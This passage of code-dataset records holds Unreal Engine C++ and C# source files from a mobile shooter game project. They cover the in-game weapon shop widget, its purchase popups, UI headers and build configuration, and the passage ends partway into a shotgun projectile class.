32.115901947021484, "blob_id": 
"05c935c40062e3411b26521888ee3b45ed141059", "content_id": "0fe464d71a016d315ae27c5fcd113e3e8f13e0ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 12351, "license_type": "no_license", "max_line_length": 217, "num_lines": 371, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShopWeaponSlot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetShopWeaponSlot.h\"\n#include \"UI/PG_UserWidgetBuyPopup.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/Image.h>\n#include <Components/TextBlock.h>\n#include <Components/CanvasPanel.h>\n\nvoid UPG_UserWidgetShopWeaponSlot::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Weapon\n\tPG_WIDGET_LINK(UButton, BtnWeapon);\n\tPG_WIDGET_LINK(UImage, ImgWeaponLock);\n\tPG_WIDGET_LINK(UTextBlock, TextWeaponPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasWeaponPrice);\n\n\t// Power\n\tPG_WIDGET_LINK(UButton, BtnPower);\n\tPG_WIDGET_LINK(UTextBlock, TextPowerLevel);\n\tPG_WIDGET_LINK(UTextBlock, TextPowerPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasPowerPrice);\n\n\t// Ammo\n\tPG_WIDGET_LINK(UButton, BtnAmmo);\n\tPG_WIDGET_LINK(UTextBlock, TextAmmoLevel);\n\tPG_WIDGET_LINK(UTextBlock, TextAmmoPrice);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasAmmoPrice);\n\n\n\t{\n\t\tm_pUserWidgetBuyPopup = CreateWidget<UPG_UserWidgetBuyPopup>(GetWorld(), LoadClass<UPG_UserWidgetBuyPopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_BuyPopup.WB_BuyPopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\t\tm_pUserWidgetBuyPopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnBuyOK);\n\t\tm_pUserWidgetBuyPopup->OnOnBtnClickedCancel.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnBuyCancel);\n\t\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetBuyPopup->AddToViewport(999);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetShopWeaponSlot::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::UpdateLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tABCHECK(nullptr != m_pGameMode);\n\n\tauto pPlayerSaveData = m_pGameMode->GetSavePlayerData();\n\tABCHECK(nullptr != pPlayerSaveData);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\tSetUnlockLayout(false);\n\t\treturn;\n\t}\n\n\t// 무기 판매 가능한지 검사\n\tif (false == pWeaponShopData->ServiceOpen)\n\t{\n\t\tSetUnlockLayout(false);\n\t\treturn;\n\t}\n\n\t// 무기 이미지 
설정\n\tm_pkBtnWeapon->WidgetStyle.SetNormal(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetHovered(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetPressed(pWeaponShopData->WeaponImage);\n\tm_pkBtnWeapon->WidgetStyle.SetDisabled(pWeaponShopData->WeaponImage);\n\n\tm_bIsMaxPower = m_pGameMode->IsMaxLevelPower(m_nWeaponIndex);\n\tm_bIsMaxAmmo = m_pGameMode->IsMaxLevelAmmo(m_nWeaponIndex);\n\tm_bIsAbleBuyWepaon = !m_pGameMode->IsUnlockWeapon(m_nWeaponIndex);\n\tm_bIsAbleBuyPower = m_pGameMode->IsAbleBuyRewardPointPower(m_nWeaponIndex);\n\tm_bIsAbleBuyAmmo = m_pGameMode->IsAbleBuyRewardPointAmmo(m_nWeaponIndex);\n\n\t// 무기 데이터 설정\n\tauto pWeaponOwnData = pPlayerSaveData->WeaponOwnData.Find(m_nWeaponIndex);\n\tif (pWeaponOwnData)\n\t{\n\t\tSetWepaon(pWeaponShopData->CostUnlock);\n\t\tSetPowerLevel(pWeaponOwnData->PowerLevel, pWeaponShopData->CostUpgradePower);\n\t\tSetAmmoLevel(pWeaponOwnData->MagLevel, pWeaponShopData->CostUpgradeAmmo);\n\t\tSetUnlockLayout(pWeaponOwnData->IsUnlock);\n\t}\n\telse\n\t{\n\t\tSetWepaon(pWeaponShopData->CostUnlock);\n\t\tSetPowerLevel(0, pWeaponShopData->CostUpgradePower);\n\t\tSetAmmoLevel(0, pWeaponShopData->CostUpgradeAmmo);\n\t\tSetUnlockLayout(false);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetUnlockLayout(bool bUnlock)\n{\n\tif (bUnlock)\n\t{\n\t\t// Weapon\n\t\t{\n\t\t\tm_pkBtnWeapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\tm_pkBtnWeapon->SetIsEnabled(false);\n\t\t\tm_pkImgWeaponLock->SetVisibility(ESlateVisibility::Hidden);\n\t\t\tm_pkCanvasWeaponPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t}\n\n\t\t// Power\n\t\t{\n\t\t\tm_pkBtnPower->SetIsEnabled(true);\n\t\t\tif (m_bIsMaxPower)\n\t\t\t{\n\t\t\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t\tm_pkCanvasPowerPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::Visible);\n\t\t\t\tm_pkCanvasPowerPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t}\n\n\t\t\tm_pkTextPowerLevel->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t}\n\t\t\n\t\t// Ammo\n\t\t{\n\t\t\tm_pkBtnAmmo->SetIsEnabled(true);\n\t\t\tif (m_bIsMaxAmmo)\n\t\t\t{\n\t\t\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t\tm_pkCanvasAmmoPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::Visible);\n\t\t\t\tm_pkCanvasAmmoPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\t}\n\n\t\t\tm_pkTextAmmoLevel->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t}\n\t}\n\telse\n\t{\n\t\t// Weapon\n\t\tm_pkBtnWeapon->SetVisibility(ESlateVisibility::Visible);\n\t\tm_pkBtnWeapon->SetIsEnabled(m_bIsAbleBuyWepaon);\n\t\tm_pkImgWeaponLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkCanvasWeaponPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\n\t\t// Power\n\t\tm_pkBtnPower->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtnPower->SetIsEnabled(false);\n\t\tm_pkTextPowerLevel->SetVisibility(ESlateVisibility::Hidden);\n\n\t\t// Ammo\n\t\tm_pkBtnAmmo->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkBtnAmmo->SetIsEnabled(false);\n\t\tm_pkTextAmmoLevel->SetVisibility(ESlateVisibility::Hidden);\n\t}\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex, int32 nSlotIndex)\n{\n\tABCHECK(nullptr != m_pkBtnWeapon);\n\tABCHECK(nullptr != 
pGameMode);\n\n\tm_pGameMode = pGameMode;\n\tm_nWeaponIndex = nWeaponIndex;\n\tm_nSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetWepaon(int32 nPrice)\n{\n\tm_pkTextWeaponPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetPowerLevel(int32 nPowerLevel, int32 nPrice)\n{\n\tif (m_bIsMaxPower)\n\t\tm_pkTextPowerLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\telse\n\t\tm_pkTextPowerLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), nPowerLevel)));\n\n\tm_pkTextPowerPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::SetAmmoLevel(int32 nAmmoLevel, int32 nPrice)\n{\n\tif (m_bIsMaxAmmo)\n\t\tm_pkTextAmmoLevel->SetText(FText::FromString(TEXT(\"MAX\")));\n\telse\n\t\tm_pkTextAmmoLevel->SetText(FText::FromString(*FString::Printf(TEXT(\"LV %d\"), nAmmoLevel)));\n\n\tm_pkTextAmmoPrice->SetText(FText::FromString(*FString::Printf(TEXT(\"%d\"), nPrice)));\n}\n\n\nvoid UPG_UserWidgetShopWeaponSlot::ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetValue((int32)ekBuyType);\n\tm_pUserWidgetBuyPopup->SetTitle(kTitle);\n\tm_pUserWidgetBuyPopup->SetPrice(nPrice);\n\tm_pUserWidgetBuyPopup->SetDescription(kDescription);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::ShowMessageBox(FString kTitle, FString kDescription, int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetValue(nValue);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnWeapon()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Weapon, pWeaponShopData->WeaponData.Name, TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUnlock);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnPower()\n{\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Power, FString::Printf(TEXT(\"%s 
Power\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradePower);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBtnAmmo()\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\tif (nullptr == pWeaponShopData)\n\t{\n\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t//SetEnable(false);\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tShowBuyPopupBox(EBuyType::eBT_Ammo, FString::Printf(TEXT(\"%s Ammo\"), *pWeaponShopData->WeaponData.Name), TEXT(\"Do you want to buy?\"), pWeaponShopData->CostUpgradeAmmo);\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBuyOK(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tif (false == m_pGameMode.IsValid(true))\n\t{\n\t\tABLOG(Error, TEXT(\"m_pGameMode is nullptr\"));\n\t\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Purchase failed.\"), PG_INVALID_INDEX);\n\t\treturn;\n\t}\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 구매 진행\n\tbool bBuySuccesed = false;\n\tswitch ((EBuyType)nValue)\n\t{\n\tcase EBuyType::eBT_Weapon:\t\tbBuySuccesed = m_pGameMode->BuyWeapon(m_nWeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Power:\t\tbBuySuccesed = m_pGameMode->BuyPowerUp(m_nWeaponIndex);\t\tbreak;\n\tcase EBuyType::eBT_Ammo:\t\tbBuySuccesed = m_pGameMode->BuyAmmoUp(m_nWeaponIndex);\t\tbreak;\n\tdefault:\t\tbreak;\n\t}\n\n\t// 구매 실패\n\tif (false == bBuySuccesed)\n\t{\n\t\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\t\tABCHECK(nullptr != pGameInstance);\n\n\t\tconst FPGWeaponTableData* pWeaponShopData = pGameInstance->GetWeaponTableData(m_nWeaponIndex);\n\t\tif (nullptr == pWeaponShopData)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"GetWeaponTableData is Null (WeaponIndex : %d)\"), m_nWeaponIndex);\n\t\t\t//SetEnable(false);\n\t\t\treturn;\n\t\t}\n\n\t\tShowMessageBox(pWeaponShopData->WeaponData.Name, m_pGameMode->GetLastBuyErrorMsg(), nValue);\n\t}\n\n\tOnItemBuyWeapon.Broadcast();\n\n\tUpdateLayout();\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnBuyCancel(int32 nValue)\n{\n\tABCHECK(nullptr != m_pUserWidgetBuyPopup);\n\tm_pUserWidgetBuyPopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tUpdateLayout();\n}\n\nvoid UPG_UserWidgetShopWeaponSlot::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\n\tUpdateLayout();\n}" }, { "alpha_fraction": 0.7700865268707275, "alphanum_fraction": 0.7700865268707275, "avg_line_length": 18.731706619262695, "blob_id": "4759acef9a9a1d6a62743ecdb036f626f6920c37", "content_id": "e6f8f0983c4b7d9e3134cb9cc60a7870adaced9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 79, "num_lines": 41, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenPlayStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", 
"src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetScreenPlayStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenPlayStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvoid Init();\n\npublic :\n\t// 포인트 획득\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnChangeRewardPoint();\n\n\tvoid OnFire();\n\tvoid OnChangeWeapon();\n\nprivate :\n\tvoid InitPlayStageWeaponBag();\n\tvoid InitPlayMissionState();\n\n\tvoid UpdateWeaponSlotLightBox();\n\nprivate :\n\tPG_WIDGET_DECLAR(UPG_UserWidgetPlayMissionState, WB_MissionState);\n\tPG_WIDGET_DECLAR(UPG_UserWidgetPlayStageWeaponBag, WB_PlayStageWeaponBag);\n};\n" }, { "alpha_fraction": 0.7860962748527527, "alphanum_fraction": 0.7946524024009705, "avg_line_length": 23.181034088134766, "blob_id": "607664f4c81586a6016065cd09d7b761ccecac74", "content_id": "ca53a61193beb63bd1a0510015cd3e61c33b3c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2845, "license_type": "no_license", "max_line_length": 99, "num_lines": 116, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetShopWeaponBox.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetShopWeaponBox.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE(FOnItemBuyWeapon);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetShopWeaponBox : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetWeaponIndex(class APG_GameModeBase* pGameMode, int32 nWeaponIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetSlotIndex(int32 nSlotIndex);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetPowerLevel(int32 nPowerLevel);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetAmmoLevel(int32 nAmmoLevel);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnable(bool bEnable);\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\nprivate :\n\tUFUNCTION()\n\tvoid ShowBuyPopupBox(enum EBuyType ekBuyType, FString kTitle, FString kDescription, int32 nPrice);\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription, int32 nValue);\n\n\npublic :\n\tUFUNCTION()\n\tvoid OnBuyOK(int32 nValue);\n\tUFUNCTION()\n\tvoid OnBuyCancel(int32 nValue);\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected :\n\t// 무기 언락 요청\n\tUFUNCTION()\n\tvoid OnRequestUnlockWeapon();\n\t// 파워 레벨업 요청\n\tUFUNCTION()\n\tvoid OnRequestLevelupPower();\n\t// 탄약 확장 요청\n\tUFUNCTION()\n\tvoid OnRequestLevelupAmmo();\n\npublic :\n\tFOnItemBuyWeapon OnItemBuyWeapon;\n\t\nprotected :\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 WeaponIndex = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 SlotIndex = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 PowerLevel = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 AmmoLevel = PG_INVALID_INDEX;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsMaxPower = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsMaxAmmo = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool 
IsAbleBuyWepaon = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsAbleBuyPower = false;\n\tUPROPERTY(BlueprintReadWrite)\n\tbool IsAbleBuyAmmo = false;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Weapon;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Power;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_Ammo;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_PowerLevel;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_AmmoLevel;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_WeaponLock;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_PowerUp;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UImage* Img_AmmoUp;\n\nprivate :\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n\n\tUPROPERTY()\n\tclass UPG_UserWidgetBuyPopup*\t\tm_pUserWidgetBuyPopup;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup*\tm_pUserWidgetMessagePopup;\n\t\n};\n" }, { "alpha_fraction": 0.7810218930244446, "alphanum_fraction": 0.7810218930244446, "avg_line_length": 33.25, "blob_id": "569529c9bfe1209d7570d0ac22caa9c2f72fcc36", "content_id": "2fa9dc7cb65069c0c3b894164147f84c420089a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 276, "license_type": "no_license", "max_line_length": 84, "num_lines": 8, "path": "/Source/Project_Gun/Project_Gun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Modules/ModuleManager.h>\n\nDEFINE_LOG_CATEGORY(Project_Gun);\nIMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, Project_Gun, \"Project_Gun\" );\n" }, { "alpha_fraction": 0.6721750497817993, "alphanum_fraction": 0.6739615797996521, "avg_line_length": 26.64197540283203, "blob_id": "ff75e86ab7a097c808046375311ba4c4cf455f22", "content_id": "a603d4d6cd77a08766f20aea2026efee36b84d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2395, "license_type": "no_license", "max_line_length": 95, "num_lines": 81, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenShop.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenShop.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenShop : public UUserWidget\n{\n\tGENERATED_BODY()\n\n\tenum\n\t{\n\t\t// 사용하지 않도록 개선 예정\n\t\teMaxLethalShopItemSlot = 3,\t\t// 필살기 \n\t\teMaxWeaponShopItemSlot = 3,\t\t// 무기\n\t};\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic :\n\tvoid Init();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLethalShopLayout();\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponShopLayout();\n\tUFUNCTION(BlueprintImplementableEvent, Category = \"RewardPoint\")\n\tvoid UpdateRewardPoint();\n\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetADRemainTime(int32 nTime);\n\n\tvoid ShowMessageBox(FString kTitle, FString kDescription);\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGotoLobby();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnADView();\n\n\t//============================================================================================\n\t// 광고 
시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoError();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\n\t//============================================================================================\n\n\t// 메시지 팝업박스\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected:\n\tPG_WIDGET_DECLAR(UButton, BtnGotoLobby);\n\tPG_WIDGET_DECLAR(UButton, BtnADView);\n\tPG_WIDGET_DECLAR(UTextBlock, TextADRemainTime);\n\t\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetSkillSlot, WB_SkillSlot);\n\tPG_WIDGET_DECLAR_TArray(UPG_UserWidgetShopWeaponSlot, WB_ShopWeaponSlot);\n\npublic:\n\t// 메인로비\n\tUPROPERTY(EditAnywhere, BlueprintReadOnly, Category = \"PG Setting WidgetClass\")\n\tTSubclassOf <class UPG_UserWidgetMainLobby_Renewal> WB_MainLobbyClass;\n\tUPROPERTY()\n\tclass UPG_UserWidgetMainLobby_Renewal* m_pWBMainLobby = nullptr;\n\n\t// 메시지 팝업\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n" }, { "alpha_fraction": 0.7753779888153076, "alphanum_fraction": 0.7775378227233887, "avg_line_length": 26.235294342041016, "blob_id": "d48ebf04523d195d6172967ccaf8295258e82fca", "content_id": "f7cc6a9e4a2b20896ef4e5c5228abf96af87e063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 463, "license_type": "no_license", "max_line_length": 78, "num_lines": 17, "path": "/Source/Project_GunEditor.Target.cs", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\nusing UnrealBuildTool;\nusing System.Collections.Generic;\n\npublic class Project_GunEditorTarget : TargetRules\n{\n\tpublic Project_GunEditorTarget(TargetInfo Target) : base(Target)\n\t{\n\t\tType = TargetType.Editor;\n\n\t\tDefaultBuildSettings = BuildSettingsVersion.V2;\n\t\t//ShadowVariableWarningLevel = WarningLevel.Warning;\n\n\t\tExtraModuleNames.AddRange( new string[] { \"Project_Gun\" } );\n\t}\n}\n" }, { "alpha_fraction": 0.7799059152603149, "alphanum_fraction": 0.7829301357269287, "avg_line_length": 27.33333396911621, "blob_id": "725cd10f2f69870d68c15cccc61bc42a2562e1b3", "content_id": "2257e428b6e109c09bb12d1e7eb3d6373b31069a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3040, "license_type": "no_license", "max_line_length": 206, "num_lines": 105, "path": "/Source/Project_Gun/Private/BlueScriptObject/Projectile/PG_ProjectileShutgun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Projectile/PG_ProjectileShutgun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n\nAPG_ProjectileShutgun::APG_ProjectileShutgun()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionMeshComponent = 